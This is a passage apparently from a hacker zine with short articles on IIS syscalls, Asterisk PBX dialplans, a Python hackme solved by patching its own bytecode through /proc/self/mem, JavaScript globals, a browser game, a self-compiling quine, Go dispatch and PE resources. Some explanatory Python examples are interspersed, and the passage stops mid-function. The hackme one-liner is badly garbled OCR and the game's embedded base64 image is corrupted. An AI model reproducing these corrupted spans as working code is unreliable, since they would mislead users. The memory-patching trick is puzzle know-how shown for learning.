ated ring-3 library was isatq.dll, with "atq" meaning
asynchronous thread queue. The only missing piece were 
the names of the syscalls. 

After another while of recon, we managed to dig 
out the symbols for both versions, in a dedicated 
.cab archive (NT) and a complete system symbols 
package (2000). Our curiosity was finally satis- 
fied, with the mysterious syscalls turning out to be 
SPUD{Initialize, Terminate, TransmitFileAndRecv, 
SendAndRecv, Cancel, GetCounts, CreateFile} in 
IIS5, with the addition of SPUDCheckStatus and 
SPUDOplockAcknowledge in IIS4. It was a fun arche- 
ological adventure into operating system prehistory. 


Mateusz Jurczyk 
Let Your Server Answer the Phone


Ft. Clvrpny, https://disconnectmy.icu 


Have you ever wanted to play a game with a landline 
telephone? Do you need to chat with friends but Discord 
is down again? Did something happen to your VPS but 
you don't have a laptop nearby? Stop worrying and start 
using a PBX to solve your issues! A Private Branch 
Exchange, as official as it sounds, isn't just for 
businesses. With the proper configuration, your PBX can 
be used for fun as well! Here are a few ideas and 
example snippets to get started. 


Note: The following examples are excerpts from dial 
plans, running on open source software Asterisk PBX 
(www.asterisk.org). You will also need a SIP trunking 
provider to forward VoIP calls to your server! 


Dialplan Basics


In Asterisk, a dialplan is a file (or files) that determines 
how calls are answered, routed, and hung up as they 
pass through your PBX. Each entry in a dialplan has an 
extension, priority, and an application, such as: 


exten => 300,1,Answer(50)


This example simply opens a line when a call comes 
through on extension 300. Additional functions must 
have an incremental priority number. In general, be sure 
to always answer and hang up a call as it progresses 
through the dialplan. Start out with a simple dial plan that 
plays a greeting sound and waits 10 seconds for an 
extension: 


exten => _+<PBXnumber>,1,Answer(50)
 same => n,Background(greeting)
 same => n,WaitExten(10)
 same => n,Hangup()


Conference Room

With a simple one-line addition to your dialplan, you can
easily set up a conference room for you and your friends
to discuss important matters:

exten => 123,1,ConfBridge(123)
Running Commands

Your PBX can be used to run commands remotely in a
pinch. Please note that there is a lot to learn in regards
to securing a PBX, meaning this is probably not a good
idea unless you are confident in your ability to configure
one! The command will execute using the system's shell.

exten => 3,1,System(echo "Incoming!")  ; System() hands the command to the shell


Cleverpony

WTFPL

Phreaking


Dungeon Crawler 


Stitching together extensions, redirects, and messages, 
it is easy to create a dungeon crawler style game 
playable entirely through a phone! For example, let 
buttons 2 and 8 be North/South and 4 and 6 be 
East/West. 


[enter]
exten => 100,1,Background(greeting)
exten => 2,1,Goto(locA,start,1)      ; North
exten => 8,1,Playback(blocked)       ; South (X)
exten => 8,2,Goto(enter,100,1)

; East/West
exten => 4,1,Playback(blocked)       ; East (X)
exten => 4,2,Goto(enter,100,1)
exten => 6,1,Goto(locD,start,1)      ; West

[locA]
exten => start,1,Playback(locA_audio)
exten => 8,1,Goto(enter,100,1)       ; South
exten => _X,1,Playback(blocked)
 same => n,Goto(locA,start,1)        ; replay the location after the blocked message

[locD]
exten => start,1,Playback(locD_audio)
exten => 6,1,Goto(enter,100,1)       ; West
exten => _X,1,Playback(blocked)
 same => n,Goto(locD,start,1)


This example only has three distinct areas, the entry 
area, location A (to the north) and location D (to the 
east). Attempting to move in a direction where there isn't 
an area will play a message claiming that the direction is 
invalid. This is a simple example, for something more 
complete consider first drawing a flowchart of areas and 
such. 


For location audio, Asterisk expects a GSM audio file, 
which it can natively convert from 8kHz mono WAVs 
through the console command: 


file convert audio.wav audio.gsm 

In addition, Asterisk supports setting and controlling flow 
based on variables, which can be used to implement a 
simple inventory system! As variables and logic are 
rather large topics, it is recommended to review them on 


the official online documentation: 


https://wiki.asterisk.org/wiki/display/AST/Variables 


disconnectmy.icu 


rail 


Programming

A PYTHON PWNLINER'S TALE
INTRODUCTION

A while back, the friendly warlock @domenuk posted a series of small hackmes fitting the size of a tweet. Among them, the one shown to the right. It didn't take long for the community to realize that this challenge is trivially solvable using the ctypes or inspect module. This was challenge enough to come up with a solution which works out of the box without relying on additional modules. Furthermore, it is an old tradition to express spells in single, unreadable lines, so the following scroll of solvableness was crafted eventually:


oS (Lambda: 
Xr 9.read(y-— 
[x[0] split (ys) 


[(x,y.find (globals ( 


if rag: antigravi ty 


PrN 'Solveqny 
#Everyh, 
Pores ney LovePytp, 
MEP AStebin yas nite Male 


N.com/gg 7HINTS 


if g.seek(x)]] | x in [x.spli : 116),int(x[1 ) ['solve_me'] 
Lae ye plit ( 1,16), 0 ' ~ “code, 
** Y!=-1 and 9-Seek (xtyhogery * 2p. OPEN" /proc/self mayer r  SeLE/meM", roy coo ee) for x,y,g in 
read ( rx in 


OBSERVATIONS

There is a lot to unpack here, but a couple of things become immediately visible upon closer examination:

Firstly, the full solution is squeezed into a single lambda function allowing for a solution within a single expression. However, those anonymous functions forbid to assign variables in a traditional way, an obstacle circumvented by the author via excessive use of list comprehension (list comprehension for non-readability!).

Secondly, two files are opened and used by the spell: "/proc/self/mem" and "/proc/self/maps". Both are special files in the process information pseudo-filesystem in Linux; the former poses an interface to read and write a process's memory, while the latter shows its memory mapping in a textual representation, as shown for a dummy executable on the right.

Thirdly, the spell seems to look for globals()['solve_me'].__code__.co_code within the process's memory. This is an easy way to retrieve the python bytecode of the solve_me function, and its disassembly is shown below:

In [1]: import dis

In [2]: dis.dis(solve_me)
  2           0 LOAD_FAST                0 (solution)
              3 CALL_FUNCTION            0 (0 positional, 0 keyword pair)
              6 STORE_FAST               1 (res)
  3           9 DELETE_FAST              1 (res)
  4          12 LOAD_CONST               1 (0)
             15 LOAD_CONST               0 (None)
             18 IMPORT_NAME              0 (antigravity)
             21 STORE_FAST               2 (antigravity)
  5          24 LOAD_FAST                1 (res)
             27 POP_JUMP_IF_FALSE       40
  6          30 LOAD_GLOBAL              0 (print)
             33 LOAD_CONST               2 ('solved')
             36 CALL_FUNCTION            1 (1 positional, 0 keyword pair)
             39 POP_TOP
        >>   40 LOAD_CONST               0 (None)
             43 RETURN_VALUE

Note the LOAD_FAST instruction at offset 24: this pushes the reference to the variable res for evaluation onto the stack. It is afterwards evaluated at offset 27 with the POP_JUMP_IF_FALSE instruction. These two instructions are the bytecode equivalent of the line containing "if res:" in the original challenge.

PUTTING IT ALL TOGETHER

So, what is going on in the spell? At the end of the day, it's conceivably simple: The anonymous function parses the content of "/proc/self/maps" to find writeable memory segments in the process's memory space to prevent SEGFAULTs later on. It then searches for occurrences of the solve_me bytecode within those writeable segments and writes the byte \x02 at offset 25 from the found location.

As a result, instead of the reference to local variable 1 (res), the reference to local variable 2 (antigravity) is pushed onto the stack for evaluation. As this variable is declared, the script will happily print "solved" when executing the bytecode of solve_me. Clever, huh?

P.S.: Below is the example solution by @domenuk, based on inspect - but this is a story to be told another time.

def solution():
    import inspect as i, webbrowser as w, ctypes as c
    def o(x):
        # every frame up the stack gets a local "res" = 1; the C call makes
        # the interpreter pick up the changed f_locals
        for f in i.stack():
            f[0].f_locals["res"] = 1
            c.pythonapi.PyFrame_LocalsToFast(c.py_object(f[0]), c.c_int(0))
    w.open = o

@nSinusR
https://www.tasteless.eu
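Since the one-byte patch is the heart of the spell, this added example (not the original challenge or the spell) rebuilds solve_me from the disassembly above and applies the same change with code.replace() instead of /proc/self/mem, which also shows where the argument byte sits on today's two-byte instructions. `find_res_load` and `patch_local_index` are names chosen here, and json stands in for antigravity.

```python
import dis
import types


def solve_me(solution):
    """Stand-in for the tweet-sized challenge, rebuilt from the disassembly above:
    `antigravity` (which would open a browser) is swapped for a harmless module
    and success is returned rather than printed, so it can be asserted on."""
    res = solution()
    del res
    import json as antigravity
    if res:
        return "solved"
    return None


def find_res_load(func):
    """Byte offset of the load that feeds the `if res:` test, plus the
    local-variable index it loads. 3.12+ emits LOAD_FAST_CHECK for a local
    that may be unbound, which `res` is after `del res`, hence the prefix match."""
    for ins in dis.get_instructions(func):
        if ins.opname.startswith("LOAD_FAST") and ins.argval == "res":
            return ins.offset, ins.arg
    raise LookupError("no load of `res` in %s" % func.__name__)


def patch_local_index(func, new_name):
    """Copy of func whose `if res:` loads `new_name` instead: the one-byte change
    the spell applies through /proc/self/mem, made here with code.replace().
    Since 3.6 each instruction is opcode+arg (two bytes), so the argument byte
    is at offset+1; the 3.5 listing above has three-byte instructions, which is
    why the article patches offset 25 = 24 + 1."""
    code = func.__code__
    offset, _ = find_res_load(func)
    raw = bytearray(code.co_code)
    raw[offset + 1] = code.co_varnames.index(new_name)   # antigravity is local 2
    patched = code.replace(co_code=bytes(raw))
    return types.FunctionType(patched, func.__globals__, func.__name__)


if __name__ == "__main__":
    print(find_res_load(solve_me))                                  # (offset, 1)
    print(patch_local_index(solve_me, "antigravity")(lambda: 0))    # solved
```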


Javascript - Global Variables


JAVASCRIPT TIPS AND TRICKS - Global variables


Declaring variables is not always easy. In current browsers, the global variables are stored in the window object and sometimes, you may declare them even if you don't want to.

Also there are 3 ways of defining variables:

const variable = 0; //block scoped, won't be reassigned
let variable = 0; //block scoped, may be reassigned (like counter in a loop)
var variable = 0; //and
variable = 0; //function scoped, may be reassigned

'function scope' means that a given variable is available inside the function it was created in; if not created inside a function, it's global.
'block scope' means that a variable is available inside a block, i.e. anything surrounded by curly braces.

There is also strict mode in JavaScript. That mode is declared by adding "use strict"; at the beginning of a script or a function. Declared at the beginning of a script, it has global scope, but declared inside a function, it has local scope. With strict mode, you cannot, for example, use undeclared variables.

"use strict";
variable = 3.14; // error: variable is not declared
var variable = 3.4; // this will not cause an error

Now, let's assume you have the following code:

var mysteryVariable = 11;
console.log(mysteryVariable);

This will obviously output 11 in the console. Because the code is not executed in a function, the context will be global. This means that window.mysteryVariable contains 11 as well.

Sometimes JavaScript could be tricky since you can override existing global variables or functions:

function alert() {
  console.log("Overriden alert");
}
alert('Hello world');

When executing window.alert (or just alert), it won't show the alert popup since we have overriden the native alert function.

If we want to keep the variable's name, then we need a wrapping function (to prevent overriding existing global variables or functions) that is immediately called, like below:

var alert = "overwrites window.alert";
(function () {
  let alert = "scoped to function";
  console.log(alert);
})();

Also, you can send the window and other globals as arguments to that function. This is often used, for example, in jQuery plugins (jQuery allows you to disable the $ reference to the jQuery namespace).

(function($) {
  // inside this function $ is guaranteed to be jQuery
})(jQuery);


Dorian Mazur https://mazurdorian.pl
Bomb Out!

Dyna Blaster was always my favorite party game, but it
wouldn't fit on a single page. But hey, Bomb Out! does!
Controls: Player 1: WSAD+1, Player 2: arrow keys + Enter

Gynvael Coldwind
https://twitter.com/gynvael

P.S. Make sure red-italics are unbroken strings - copy/paste will break it!

<html><style> /* Bomb Out! by Gynvael Coldwind */
body {margin:0; padding:0} /* Paged Out! #1 */
div {width:30px; height:30px; position:absolute;
font-size:30px} /* Works on Chrome/FF/Edge! */
.bg {width:720; height:480; background:#0c1}
.wall {width:20px; height:20px; border-width:5px;
border-style:outset; background:#ccc}
.brick {border-style:outset; border-width:3px;
width:24px; height:24px; /* ↓ 4-bit BMP (RLE) */
background:url('data:image/bmp;base64,QRI@AAAAAAAAAE TAAAAOAAAACAAAAAGAAAABAAQAAGAAADIAAAAJLGAATY4AAAMAAAADAAAAPKSRAMPDwwDa2 toAAgIGEQAAAgGIGEQAAAgGEGIGAACAAAAAATERECEQAAAAGREQIRAAAACCII(ASTAAAGAAAE')}
.player {width:26px; height:26px; z-index:2;
margin:-8px 0 0 -8px} /* Code is pretty... */
.bomb {margin:-7px 0 0 -4px; z-index:1} /* ... */
.boom {font-size:34px; z-index:2;
margin:-8px 0 0 -8px} /* ...compressed ;) */
@keyframes bb {0% {background-color:#cef}
100% {background-color:#9df}}
.bonus {font-size:20px; animation:bb 1s infinite;
text-align:center} /* ...but still readable! */
.txt {width:100%; text-align:center; top:2px;
font-family:sans-serif; font-size:22px}
</style><body><div class="bg"> <!-- ...kinda -->
<div class="txt">Bomb Out!</div></div></body>
<script
src="https://code.jquery.com/jquery-3.4.1.min.js"
integrity="sha256-CSXorXvZcTkaix6Yvo6HppcZGetbYMGWSFLBw8HfCJo=" crossorigin="anonymous"></script>
<script> PX='px'; /* var|0 is a cast to int */
Pos = (e,x,y)=>e.css({left:x|0+PX, top:y|0+PX});
Div = (c,x,y)=>Pos($('<div/>',{class:c}),x,y)
.appendTo(BG); /* ↓ pixel pos * 1D index conv */
I2px = (i)=>[15+(i%23)*30, 30+(i/23|0)*30];
Px2i = (x,y)=>((x-15)/30|0)+(y/30-1|0)*23;
Collpx = (x,y,nc)=>!nc.includes(Px2i(x,y))&&
(MMAP[Px2i(x,y)]||[0])[0];
MmapAdd = (c,i)=>MMAP[i]=[c,Div(
[0,'wall','brick','bomb'][c],...I2px(i))];
Rnd = Math.random;
AVATAR = ['&#x1F63E;', '&#x1F608;'];
PPXPOS = [[47,62], [647,422]];
PIPOS = [[24],[320]]; PINV = [[1,3],[1,3]];
KEYB = []; MBOMB = []; MMAP = []; MITEM = [];
LASTTM = $.now(); DEAD = 0; END = 0;
Boom = (bomb,pos,pl,range,dir=9)=>{
MBOMB[pos]=0; MMAP[pos]=[0]; bomb.remove();
PINV[pl][0]++; /* ↓ explode in every dir */
[-23,23,-1,1].map((v,j)=>{ if(j==dir) return;
for(let k=0;k<range;k++){
let c=pos+v*k, p=I2px(c), e=MMAP[c]||[0];
if(e[0]==1) break;
let x=Div('boom',...p).html('&#x1F4A5;');
x.fadeOut(500, ()=>x.remove());
PIPOS.forEach((pipos,pl)=>DEAD|=pipos.some(
i=>i==c)?PDIV[pl].html('&#x1F480;')|1<<pl:0);
if(e[0]==2) { e[1].remove(); e[0]=0;
if(Rnd()<0.3) { let t = (Rnd()<0.5)|0;
MITEM[c] = [t,Div('bonus',...p).html(
['&#x1F4A3;','&#x1F525;'][t])]; } break; }
if(MITEM[c]) {
MITEM[c][1].remove(); MITEM[c]=0; break; }
let b=MBOMB[c]; if(b) {
clearTimeout(b[1]); b[0](b,c,pl,range,j); }
}})}
Mainloop = ()=>{
if(END) return;
let tm = ($.now()-LASTTM)/1000;LASTTM = $.now();
[38,40,37,39,87,83,65,68].forEach((c,i)=>{
if(!KEYB[c]) return; /* ↑ these are keycodes */
let k=PPXPOS[i>>2].map((v,j)=>
v+[[0,-1],[0,1],[-1,0],[1,0]][i%4][j]*tm*120);
let kk=[0,1,2,3].map( /* 4 corners of player */
j=>[k[0]+26*(j&1), k[1]+26*(j>>1)]), q=i>>2;
if(!kk.some(t=>Collpx(...t,PIPOS[q]))) {
PPXPOS[q]=k; PIPOS[q]=kk.map(t=>Px2i(...t));
PIPOS[q].forEach(c=>{let b=MITEM[c]; if(b){
PINV[q][b[0]]++; b[1].remove(); MITEM[c]=0;
}})}}); /* Movement model is kinda bad TBH */
[13,49].forEach((c,i)=>{ /* <- keycodes too */
if(!(KEYB[c]&&PINV[i][0])) return; KEYB[c]=0;
let m=Px2i(PPXPOS[i][0]+13,PPXPOS[i][1]+13);
if(!MBOMB[m]) {
let b=Div('bomb',...I2px(m)).html('&#x1F4A3;'),
cb=()=>{Boom(b,m,i,PINV[i][1])};
MMAP[m]=[3]; PINV[i][0]--;
MBOMB[m]=[cb, setTimeout(cb,3000)];
}});
PDIV.forEach((c,i)=>Pos(c,...PPXPOS[i]));
if(DEAD) END=$(".txt").html(DEAD==3?"Draw!":
"Player "+AVATAR[(DEAD==1)|0]+" wins!"); }
Resetmap = ()=>{
BG=$('.bg')[0];
for(k=0;k<15*23;k++) {
let i=k%23, j=k/23|0; /* ↓ taxi distance */
if(Rnd()<0.6&&[[1,1],[21,13]].every(p=>Math.abs
(i-p[0])+Math.abs(j-p[1])>1)) MmapAdd(2,k);
if(!(i%2||j%2)||!i||i==22||!j||j==14)
MmapAdd(1,k); }
PDIV=[0,1].map(
i=>Div('player',...PPXPOS[i]).html(AVATAR[i]))}
$(function(){ $(document).keydown(e=>KEYB[
e.keyCode]=1).keyup(e=>KEYB[e.keyCode]=0);
Resetmap();setInterval(Mainloop,15);});</script>
quinesnake - a quine that plays snake over its own source!
github.com/taylorconor/quinesnake

A quine that plays snake over its own source! It compiles itself! Run it with ./quinesnake.cpp

/*bin/ls>/dev/null;sed -n 's/.*.\/\*\(.*\)../\1/p' $0|I=$0 sh;exit;*/std::map<I,
I>m={{97,1},{'w',/*echo g++ -std=c++11 -oo $I -lcurses -DI=int -DF=if -DK=ret\*/
2},{'d',3}};I/*urn -includectime,curses.h,iostream,map,unistd.h|sed s/,/\ -in\*/
w=80,h=28,x=2,y=2,a=2,b=0,d,e,z=768;std::wstring/*clude/g|sh;./o</dev/tty;exit*/
s=LR"x(/*bin/ls>/dev/null;sed -n 's/.*.\/\*\(.*\)../\1/p' $0|I=$0 sh;exit;*/std:
:map<I,I>m={{97,1},{'w',/*echo g++ -std=c++11 -oo $I -lcurses -DI=int -DF=if -DK
=ret\*/2},{'d',3}};I/*urn -includectime,curses.h,iostream,map,unistd.h|sed s/,/\
 -in\*/w=80,h=28,x=2,y=2,a=2,b=0,d,e,z=768;std::wstring/*clude/g|sh;./o</dev/tty
;exit*/s=LR"x%dx";I G(I x,I y){K 3&s[y*w+x]>>8;}I C(I x,I y,I c){(s[y*w+x]&=~z)|
=c<<8;}I P(I d,I &x,I &y){F(d==1)x-=2;!d&&y++;d==2&&y--;F(d==3)x+=2;}I M(){curs_
set(0);I a=rand()%w/2*2,b=rand()%h;timeout(0);F(!G(a,b))C(a,b,2);else M();}I A(I
 x,I y){K s[y*w+x]>>10;}I S(I d){(s[y*w+x]&=~3072)|=d<<10;}I T(){d=A(x,y);F(0<=(
e=getch())&&abs(m[e]-d)!=2)d=m[e];S(d);P(d,x,y);F(x<0||y==h||y<0||x>w-2||G(x,y)&
1)K 0;S(d);F(G(x,y)&2)M();else{s[b*w+a]&=~z;P(A(a,b),a,b);}C(x,y,1);move(0,0);fo
r(I i=0;i<w*h;){attron(e=z&s[i]);addch((char)s[i++]);addch(s[i++]);attroff(e);F(
!(i%w))addch(10);}refresh();K 1;}I main(){srand(time(0));while((e=s.find(10))>0)
s.erase(e,1);s.replace(s.find(L"%d"),2,L"("+s+L")");initscr();start_color();for(
e=0;e<3;){init_pair(e,0,e+9);C(2,e++,1);}noecho();M();while(T())usleep(z<<7);end
win();})x";I G(I x,I y){K 3&s[y*w+x]>>8;}I C(I x,I y,I c){(s[y*w+x]&=~z)|=c<<8;}
I P(I d,I &x,I &y){F(d==1)x-=2;!d&&y++;d==2&&y--;F(d==3)x+=2;}I M(){curs_set(0);
I a=rand()%w/2*2,b=rand()%h;timeout(0);F(!G(a,b))C(a,b,2);else M();}I A(I x,I y)
{K s[y*w+x]>>10;}I S(I d){(s[y*w+x]&=~3072)|=d<<10;}I T(){d=A(x,y);F(0<=(e=getch
())&&abs(m[e]-d)!=2)d=m[e];S(d);P(d,x,y);F(x<0||y==h||y<0||x>w-2||G(x,y)&1)K 0;S
(d);F(G(x,y)&2)M();else{s[b*w+a]&=~z;P(A(a,b),a,b);}C(x,y,1);move(0,0);for(I i=0
;i<w*h;){attron(e=z&s[i]);addch((char)s[i++]);addch(s[i++]);attroff(e);F(!(i%w))
addch(10);}refresh();K 1;}I main(){srand(time(0));while((e=s.find(10))>0)s.erase
(e,1);s.replace(s.find(L"%d"),2,L"("+s+L")");initscr();start_color();for(e=0;e<3
;){init_pair(e,0,e+9);C(2,e++,1);}noecho();M();while(T())usleep(z<<7);endwin();}


A quine is a program that takes no input and prints its 
own source as its only output. "Stepping outside
itself", e.g. by printing the contents of its own file,
isn't allowed; so it's not a completely trivial problem!


Quines are generally interesting to look at but almost
completely useless otherwise. The standard trick used
to write one is to represent a copy of the program's
own source as data within the program, usually in a
string. It can then be formatted into itself and printed.
This two-line Python quine is a neat example of this:

s = 's = %r\nprint(s%%s)'
print(s%s)

Quinesnake uses this string formatting to allow it to 
print its own source, but makes things more 
interesting by playing the classic game snake over 
the source (with wasd controls) after it’s printed! It’s 
still a quine, it just runs a game loop to accept 
keyboard control input, and highlights parts of the 
text as it continuously prints it to render the snake 
and the food, using the curses library. 


There are a number of techniques used to make
quinesnake as small as possible. Perhaps the most
interesting one is that it compiles itself. Making the
source file executable and executing it invokes g++
on itself with a number of flags, includes and defines.
This works because the first line of the program,
/*bin/ls>/dev/null..., is interpreted as a shell
command, despite also being a valid C++ comment.
The sed magic, borrowed mostly verbatim from
stedolan's minhttp project, parses the C++ comments
(which contain the shell commands to compile the
program) out of the source file and executes them as
a single shell command. Without this it's really tricky
to minify the program, because include and define
statements must be on their own line.


To keep track of the state of the game, and to make
the source as confusing to read as possible (which is
also important!), quinesnake stores the game state in
the spare bits of the source-as-data string used by the
quine. The type of this string is std::wstring, a
string class for storing wide (>=16 bit, or wchar_t)
characters. Since quinesnake only uses it to store 8-
bit ASCII characters, that leaves the rest spare to
store the state of the character in the output (empty,
snake, or food), and the direction of the snake pixel
that precedes this one (up, down, left or right), if it's
part of the snake. Every other wchar_t in the string
contains these 4 bits of game state in the higher order
bits above the regular character, so they're removed
by casting the wchar_t down to char when printing.


Finally, string formatting in these programs can be a 
huge pain when special characters need to be escaped 
(e.g. quotes, newlines) so that they appear as special 
characters in the source, but escaped characters in the 
source-as-data string. To not have to worry about 
this, quinesnake uses a raw wide string for the data, 
which does no special character escaping. The little 
substitution that’s required is done manually instead, 
by manually finding a %d substitution token in the 
string to replace it with the string itself. 
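The spare-bits trick and the %d expansion from the two paragraphs above, as an added Python illustration (this is not the quinesnake source, which is C++); a list of ints stands in for the std::wstring cells and the masks mirror the program's z=768 and 3072:

```python
# Added Python illustration (not the quinesnake source): game state packed
# into the bits above the 8-bit character of each cell, and the %d expansion.
STATE_MASK = 768    # 0x300, bits 8-9: 0 = empty, 1 = snake, 2 = food
DIR_MASK = 3072     # 0xC00, bits 10-11: 0 = down, 1 = left, 2 = up, 3 = right


def board_from_source(source: str) -> list:
    """One cell per character; newlines are dropped, as quinesnake's main() does."""
    return [ord(ch) for ch in source if ch != "\n"]


def set_state(board: list, i: int, state: int) -> None:
    board[i] = (board[i] & ~STATE_MASK) | (state << 8)


def get_state(board: list, i: int) -> int:
    return (board[i] & STATE_MASK) >> 8


def set_dir(board: list, i: int, d: int) -> None:
    board[i] = (board[i] & ~DIR_MASK) | (d << 10)


def get_dir(board: list, i: int) -> int:
    return (board[i] & DIR_MASK) >> 10


def render(board: list, width: int = 80) -> str:
    """What ends up on screen: the low byte of every cell (the (char) cast),
    re-wrapped into lines of `width` characters like the print loop does."""
    text = "".join(chr(cell & 0xFF) for cell in board)
    return "\n".join(text[i:i + width] for i in range(0, len(text), width))


def expand(data: str) -> str:
    """The quine step: the single %d token marks where the data string sits in
    the source, so replacing it with the parenthesised data yields the source."""
    return data.replace("%d", "(" + data + ")", 1)
```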


Hopefully this inspires you to write your next useless 
and overcomplicated program! — Conor Taylor 
Emulating Virtual Functions in Go


Go doesn't support the inheritance-based OOP
model known from languages like Java or C++;
composition is favored instead.

We are going to abuse (really, don't do it in your
code) Go's interfaces and embedding to achieve
dynamic dispatch (think virtual functions in C++).

Let's dive in!

First, we define an interface type describing all the
virtual methods that are going to be defined.

package main

import "fmt"

type VehicleVirtualParts interface {
    VColor() (int, int, int)
}

type Vehicle interface {
    Speed() int
    Color() (int, int, int)
    VehicleVirtualParts
}

VehicleBase is where most of the magic happens.

type VehicleBase struct {
    virtual VehicleVirtualParts
}

Speed() calls the "virtual" function Color(), so we
expect that the return value will be different for types
that implement VColor() differently.

func (vb *VehicleBase) Speed() int {
    r, g, b := vb.Color()
    if r == 255 && g == 0 && b == 0 {
        return 9001 // strictly over 9000
    }
    return 100
}

SetVTable() is going to be called in "constructors" of
types that inherit from VehicleBase.
VehicleBase.virtual field is an interface type, so each
time you call its method, the dynamic type's method is
going to be invoked (aka dynamic dispatch).

func (vb *VehicleBase) SetVTable(v VehicleVirtualParts) {
    vb.virtual = v
}

The Color() function makes it opaque for the rest of
the code that the implementation uses dynamic
dispatch.

func (vb *VehicleBase) Color() (int, int, int) {
    return vb.virtual.VColor()
}

We are using NewX() for every defined type. It is not
really needed for VehicleBase, but we're doing it for
the sake of consistency. Derived types are going to do
something meaningful there.

func NewVehicleBase() *VehicleBase {
    return &VehicleBase{}
}

All types below use embedding to emulate inheritance.

type Car struct {
    *VehicleBase
}

First, you need to construct your base type, and then
call SetVTable(). See NewCar() and NewMotorcycle().

func NewCar() Car {
    c := Car{NewVehicleBase()}
    c.SetVTable(c)
    return c
}

func (c Car) VColor() (int, int, int) {
    return 0, 255, 0 // cars are green
}

type Motorcycle struct {
    *VehicleBase
}

func NewMotorcycle() Motorcycle {
    m := Motorcycle{NewVehicleBase()}
    m.SetVTable(m)
    return m
}

func (m Motorcycle) VColor() (int, int, int) {
    return 255, 0, 0 // motorcycles are red
}

RedCar overrides Car's VColor() implementation.

type RedCar struct {
    Car
}

func NewRedCar() RedCar {
    r := RedCar{NewCar()}
    r.SetVTable(r)
    return r
}

func (r RedCar) VColor() (int, int, int) {
    return 255, 0, 0 // red cars are red
}

Running the program below:

func main() {
    m := NewMotorcycle()
    c := NewCar()
    r := NewRedCar()

    printSpeed("Motorcycle", m)
    printSpeed("Car", c)
    printSpeed("RedCar", r)
}

func printSpeed(name string, v Vehicle) {
    fmt.Printf("%s speed: %v\n", name, v.Speed())
}

will output:

Motorcycle speed: 9001
Car speed: 100
RedCar speed: 9001

As desired, the value of Speed() changes as it depends
on the "virtual dispatch" of the Color() function.


— kele 


Intro to Embedded Resources in Windows Apps 
by Jon ‘Doc’ Andrew 


No matter what operating system you're
working with, some type of "object" format
will be used to store binary "runnable" code
and/or data that can be executed or linked
with other objects to produce an executable.
Linux uses ELF (Executable and Linking
Format), and Windows uses PE (Portable
Executable). Generally, they perform the
exact same function, and both contain
"sections" like .text (for executable code),
.bss (uninitialized data), .data (for
initialized data), and many others. In Linux,
an application binary is an ELF object file
with a flag (ET_EXEC) set. In Windows, an
application binary is a PE object file with
a flag (IMAGE_FILE_EXECUTABLE_IMAGE) set.


So far, so good, right? If we dig a little 
deeper into the PE format used in Windows, 
there are some optional sections that are not 
present in ELF. One of these is a .rsrc 
(resource) section. Typical applications will 
have the application icon and an “application 
manifest” (XML file describing the app) 
bundled into the executable within a .rsrc 
section. The .rsrc section can even behave as 
a complete directory structure within the PE 
file! Anything can be a resource, even driver
files and 3rd party DLLs!


The advantage to using this technique over 
those described later in this article is the 
availability of Win32 API calls for easily 
accessing these resources at runtime and 
ability to re-link new resources in without 
recompilation. 


The SysInternals “procmon” app uses this 
technique to extract a kernel driver (.sys - 
which is also a PE file) used for listening 


to OS events. In fact, in an .exe you can 
embed a .dll as a resource, which itself 
contains a .sys file! In this sense, a PE 


file can act a lot like a .zip file, which 
can itself contain other .zip files. Instead 
of having to run an installer or ship a .zip 
file, a single .exe can be delivered which 
extracts the resources it needs at runtime. 


Here’s a brief example of embedding a small 
text file into an executable. This should be 
run in a Visual Studio native tools command 
prompt. I used D (www.dlang.org) for the 
executable, but C/C++ would be very similar. 
Note that 64-bit code must be used here so
link.exe will work with our D .obj file.


Creating a resource, resource definition and 
compiling into a .res file: 

> echo PAGEDOUT! > myres.txt 

> echo FOO RCDATA "myres.txt" > myres.rc 

> rc.exe myres.rc 
Source for loading the resource (hello.d):
(imports and function omitted for brevity) 


auto res = FindResource(null, "FOO", RT_RCDATA); 
char* ptr = cast(char*)LoadResource(null, res); 
auto size = SizeofResource(null, res); 
write(ptr[0 .. size]); 


Compiling, linking and running the code:
> dmd.exe -m64 -c hello.d
> link.exe hello.obj myres.res \
    /LIBPATH:C:\D\dmd2\windows\lib64 \
    legacy_stdio_definitions.lib
> .\hello.exe
PAGEDOUT!


Note that there are other ways to embed non-
executable data into an .exe. For instance,
self-extracting 7-Zip files can be created by
just concatenating a .sfx (the executable
part) with a small config file and the
compressed file archive itself using a
command like this:

> copy /b a.sfx + b.conf + c.7z d.exe

+----------+-------------+-----------------+
| PE .exe  | Config text | Compressed file |
+----------+-------------+-----------------+


The PE format is ignorant about what's at the
end of the PE image itself. If you try to
analyze the self-extracting executable with
a utility like dumpbin.exe, you'll see that
a relatively small portion of the overall
file is represented as a PE. At runtime, the
self-extracting code reads its own file to
get the config and compressed data for
extraction.
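An added example (not from the article) of the point just made: a small parser that reads only the PE header fields needed to find where the image described by the headers ends, so that whatever the copy /b trick appended after it can be measured. The PE it is run on is constructed in the block; the field layouts are the documented IMAGE_FILE_HEADER and IMAGE_SECTION_HEADER ones.

```python
# Added example, not the article's code: locate the "overlay", the bytes after
# the last section that no PE header describes. A minimal PE is constructed
# below for testing; it is not a real program.
import struct

IMAGE_FILE_EXECUTABLE_IMAGE = 0x0002  # COFF Characteristics flag named in the article


def pe_overlay(data: bytes) -> dict:
    """Return where the PE image ends inside `data` and whatever follows it.

    The end is the largest PointerToRawData + SizeOfRawData over all sections
    (or the end of the section table if there are none). Bytes past that are
    invisible to the loader. Note that an Authenticode signature also lives in
    the overlay, so an overlay on its own is not evidence of a payload.
    """
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    # IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp,
    # PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    _, nsections, _, _, _, opt_size, characteristics = struct.unpack_from("<HHIIIHH", data, coff)
    sections = coff + 20 + opt_size
    end = sections + 40 * nsections
    for i in range(nsections):
        # IMAGE_SECTION_HEADER prefix: Name, VirtualSize, VirtualAddress,
        # SizeOfRawData, PointerToRawData (the rest is not needed here)
        _, _, _, raw_size, raw_ptr = struct.unpack_from("<8sIIII", data, sections + 40 * i)
        end = max(end, raw_ptr + raw_size)
    return {
        "executable": bool(characteristics & IMAGE_FILE_EXECUTABLE_IMAGE),
        "pe_end": end,
        "overlay": data[end:],
    }


def build_sample_pe(overlay: bytes) -> bytes:
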